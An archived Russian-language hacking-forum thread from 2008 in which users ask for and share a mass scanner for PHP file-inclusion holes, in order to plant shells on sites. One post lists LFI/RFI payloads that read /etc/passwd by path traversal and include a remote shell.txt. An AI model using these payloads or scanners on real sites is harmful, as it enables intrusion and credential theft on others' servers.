PDA

Просмотр полной версии : Проверка на инклуд

lol100
23.11.2008, 05:48
ПОдскажите есть ли скрипт, который умеет определять есть ли возможность воспользоватся инклудом тоесть например зарядить ему список url такого вида www.site.com/index.php?page=а сюда наш шел
Ru}{eeZ
23.11.2008, 14:54
какой-то подобный самопис недавно выкладывали в этой же ветке, покапай предыдущие темы
lol100
23.11.2008, 19:32
Пролистал ветку почти доконца что то ненашел
[:|||||:]
23.11.2008, 19:36
скрипт от Nomer1
DIMON4G
23.11.2008, 20:21
']скрипт от Nomer1
довольно долго искал, если кому-то надо, то вот:
http://forum.antichat.ru/showthread.php?t=82211
lol100
23.11.2008, 20:31
перезалил бы кто)
DIMON4G
23.11.2008, 20:37
перезалил бы кто)
там вроде эта ссылка пашет
http://dump.ru/file/1021261/
vikseriq
23.11.2008, 20:42
http://www.sendspace.com/file/2n0w56
Залил на СС.
lol100
29.11.2008, 01:01
а есть что нить подобное толькто чтоб проверял массово из списка и удачные записовал
Pashkela
29.11.2008, 02:56
Любая автоматизация поиска уязвимостей - утопия, имхо. Со временем, конечно. Автоматизация же процесса получения данных на основе выявленной уязвимости - рулез форева.
PHPoozy
29.11.2008, 03:04
я люблю находить в ручную. т.к. автоматом никого кайфа не получишь!
Dian
29.11.2008, 03:09
Любая автоматизация поиска уязвимостей - утопия, имхо
Поиск по известным классам уязвимостей - чуть ли не механическая работа, почему ж нет?..
Pashkela
29.11.2008, 03:20
Просто я думаю, хотя это конечно весьма сугубо, что понятие " известным классам уязвимостей " весьма быстро, в смысле гораздо быстрее, чем раньше, при современных темпах развития сети и т.д, переходит в понятие "пофиксили, забудь, дружище"

ЗЫЖ Предлагаю больше на эту тему на флудить, ибо и так высеры постим личностные, а ачад, на мой взгляд, либо по делу - либо флуд. За что и ценю
PHPoozy
29.11.2008, 03:24
либо нах
Tigger
29.11.2008, 04:38
?a=../../../../../../../../../../../../../../../../etc/passwd
?a=../../../../../../../../../../../../../../../../etc/passwd%00
?a=http://site.ru/shell.txt
?a=http://site.ru/shell.txt%00
ручками, чем не вариант =))?
Solker
29.11.2008, 16:57
Какой смысл использовать руки и делать однотонную работу? (MMORPG задротам посвящается)
Машина была придумана для того, что бы как раз избежать этой монотонной работы со стороны людей. Но походу у людях в генах заложено делать однотипную работу, и они к этому так стремятся.
Я лучше поставлю Бота, пускай проверяет ссылки, а сам займусь другими делами, тем самым сохранив больше времени.